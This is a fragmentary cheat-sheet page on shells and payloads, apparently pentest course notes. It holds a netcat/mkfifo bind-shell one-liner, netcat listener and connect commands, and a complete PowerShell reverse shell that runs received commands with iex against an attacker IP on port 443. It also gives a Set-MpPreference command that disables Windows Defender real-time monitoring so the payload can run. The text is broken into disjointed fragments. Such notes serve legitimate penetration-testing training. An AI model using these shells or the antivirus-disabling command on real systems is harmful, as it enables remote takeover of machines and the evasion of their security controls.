Shells & Payloads
Last updated
Last updated
target
system has a listener started and awaits a connection from a pentester's system (attack box).rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
nc -nv 10.129.41.200 7777
sudo nc -lvnp 443
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Windows Defender antivirus
(AV
) software stopped the execution of the code. Set-MpPreference -DisableRealtimeMonitoring $true
Virus & threat protection settings
or by using this command in an administrative PowerShell console. Once AV is disabled, attempt to execute the code again.